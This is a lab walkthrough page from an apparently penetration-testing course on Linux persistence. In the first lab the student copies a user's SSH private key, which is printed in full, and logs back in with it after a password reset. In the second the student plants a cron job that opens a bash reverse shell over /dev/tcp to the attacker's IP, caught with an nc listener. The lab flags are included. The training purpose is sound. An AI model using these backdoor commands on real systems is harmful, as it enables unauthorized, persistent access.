🔬Linux Persistence

Previous🔬Linux Privilege Escalation Next🔬Cracking Hashes

Last updated 1 year ago

Was this helpful?

🔬Linux Persistence

Lab 1 - SSH

🔬
Target IP: 192.3.140.3
Persistence via SSH Keys, even after user credentials are modified
Initial credentials: student :password

ip -br -c a
	192.3.140.2/24

ssh student@192.3.140.3

SSH Keys

ls -al
    drwxr-xr-x 1 student student 4096 Apr 29 13:40 .
    drwxr-xr-x 1 root    root    4096 Apr 26  2019 ..
    -rw------- 1 student student    7 Apr 29 13:40 .bash_history
    drwx------ 2 student student 4096 Apr 29 13:39 .cache
    drwxr-xr-x 1 root    root    4096 Apr 26  2019 .ssh
    -rw-r--r-- 1 student student   91 Apr 26  2019 wait

cat wait
    Delete this file to trigger connection reset.
    Delete it only after planting the backdoor.

cd .ssh
ls
	authorized_keys  id_rsa

Show the private key inside id_rsa

cat id_rsa

-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA3JH1zC1WJuJ2KCPf1UdJe1dX+Uh4aE9RKsnuQk124eOB601/
8+Q6uJej38goVYQ7Dc4INK9Pq9cOs+uDQfRdjS1/9S7a0bDVORR6Q/E3dya0RDsz
LcaqX6LkPgnBZ2gS37E4mX6kiwEvYeqaAGyFqyfn+QPLos/Znc3EA4A71LPFg01b
AmpI6Gbaa7UUG+MCZoM0qDNo5Mzr5bmtCnVOKQ6n0Qx7znu5A2p00TfzmAo7erZ8
6xJUfXQoVFzqmINqhZKFZtjgV5nk/qHgn1BPyd6NoWeXADdIJKi7iq4jomT+Ny+/
HlxrAs1IJhxtrSExSMTkqmH/3KeX9ibBWXzY1QIDAQABAoIBAEO0liOvgvN6rlRR
9sJMGJVA0WNWyIcUWdDtnTJC/wwFvvqQlocx9oh1G7t0gFUHuuzY4pHxgl44LG40
C91x+kl8vvtu/4JAaqMT0xgJ8kGj4s/S8DnL8r5ajP8yFWj9fFWn27zaL/3vRjEj
R1R7+2f3XvCEJrz6Wk1jPRjqAvOeDRGH3ojsQwWO7k/FcvtqVBCPTGxyUBzXYv06
fM3OY5NL8D7t/bLoHa8dVhqjPnfUR7/IpiAdxEam1X0ObPB5YyBwSlpj6h904bF/
+U697IE23xjVmKMKcvTLe6QAxuRGSMf3/k3rCpDd3UxYF+P2e0CK3MefWjKpAe8r
2xRXyB0CgYEA+7zgmuhJqjik8tbt6b6+ZAJZ68TqLE1f3YEW/LivMeMj5tQZo/w+
0ZJnr6hR3eicMMxWKufGXSEtbs1TzMGvA5SXI9MTu62a5A2h7NDbLuKRwdjh9Qv6
TocFSMTSFcS4jvmbeYlVaSZWrJLLKY6lsjgdjDB4DH7Uc0Anxdr//GsCgYEA4E39
rlB7GWoCX7oXpSEGCHkQkmgX5IDU7+UUySFqD8fWoLsAc47R/TmDsKI+x83PF5jG
oo5P5LmUIeqnAKknTSyfD1YFtMa3tpTE68R9j/uueTK7v5izwWQjicmILm4RdkZJ
TVVH2b0aIQaUnpWWwHLa+BYx2jH4S2GxH89vz78CgYEA211SyApFLw0fR/Hc7kRm
OlYGL7qvaR2fvTDhbCYvnKRXQ61uDoUf5JXUvrBJbrtlZ+yX5dmE9OCVa6mHLbVV
oiQYtIIZ/wCgKbxrbybs6OVMqIQrGtNuMoHcK/Y/L/L19Lk0L2tqPy/GdamRWkxQ
vYXC0cfmxNS8oxWz0uktCrMCgYB6ufF9OMfBxgD6g4WAciss46CvmojIG71mbL8M
tV2kuMC0PN0oXRKELL3jHUKga/lNfefg9WC9UtS8IfmyINtCHJIDABwrJzdJjOiZ
326cIyb5ZUrYsCJaRAI117DNRqgDQL3GtEyV1CPBwin7Avny3mT0rKAmNIUYKaGS
OBuDXQKBgQDIRYOZEaV8rXx3wN24NYuByNUpRM3AIyPIwAuaPklWD6D2KdDveheI
lZtRb6Yzzmeon0DuLPdl7e/R7e5Z8Mx3o40aiJLULlw95JqON3J3W471PZAG1L/g
59PKgUMBNVX9UsUqvHyWlcY/FAT9UhWblgDoN3uXY9Db6q5x7hWzKw==
-----END RSA PRIVATE KEY-----

cat authorized_keys
    ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDckfXMLVYm4nYoI9/VR0l7V1f5SHhoT1Eqye5CTXbh44HrTX/z5Dq4l6PfyChVhDsNzgg0r0+r1w6z64NB9F2NLX/1LtrRsNU5FHpD8Td3JrREOzMtxqpfouQ+CcFnaBLfsTiZfqSLAS9h6poAbIWrJ+f5A8uiz9mdzcQDgDvUs8WDTVsCakjoZtprtRQb4wJmgzSoM2jkzOvlua0KdU4pDqfRDHvOe7kDanTRN/OYCjt6tnzrElR9dChUXOqYg2qFkoVm2OBXmeT+oeCfUE/J3o2hZ5cAN0gkqLuKriOiZP43L78eXGsCzUgmHG2tITFIxOSqYf/cp5f2JsFZfNjV root@localhost

Persistence

Exit the SSH session and download the id_rsa file

scp student@192.3.140.3:~/.ssh/id_rsa .
chmod 400 id_rsa

Log back into the target system and trigger the password and connection reset

ssh student@192.3.140.3
rm wait
# Old student's password do not work anymore

Connect to the target using the downloaded private key

ssh -i id_rsa student@192.3.140.3

Reveal Flag: 🚩

689227a4f1b97afe1ff5ebaf85babc19

📌 Instead of using a user's private key, typically the attacker generates an SSH key pair on his system, keeps the private key on his system, transfers the public key onto the target system user's home .ssh directory and adds it in the authorized_keys file.

Lab 2 - Cron Jobs

Target IP: 192.175.36.3
Persistence via Cron Jobs
Initial credentials: student :password

ip -br -c a
	192.175.36.2/24

ssh student@192.175.36.3

Cron Jobs

ls -al
    drwxr-xr-x 1 student student 4096 Apr 29 14:04 .
    drwxr-xr-x 1 root    root    4096 Apr 26  2019 ..
    -rw------- 1 student student   18 Apr 29 14:04 .bash_history
    drwx------ 2 student student 4096 Apr 29 14:04 .cache
    -rw-r--r-- 1 student student   91 Apr 26  2019 wait

cat wait
    Delete this file to trigger connection reset.
    Delete it only after planting the backdoor.

cat /etc/cron*

Persistence

Create a new Cron job as the student user
- The command inside the cron job will be executed with the student's permissions'

echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/192.175.36.2/1234 0>&1'" > cron

crontab -i cron
crontab -l

Log back into the target system and trigger the password and connection reset

ssh student@192.175.36.3
rm wait
# Old student's password do not work anymore

Setup a nc listener and wait for the bash reverse shell from the cron job that runs every minute

nc -nvlp 1234

Reveal Flag: 🚩

79969e32981f722464fde4ce7f208883

Previous🔬Linux Privilege Escalation Next🔬Cracking Hashes

Last updated 1 year ago

Was this helpful?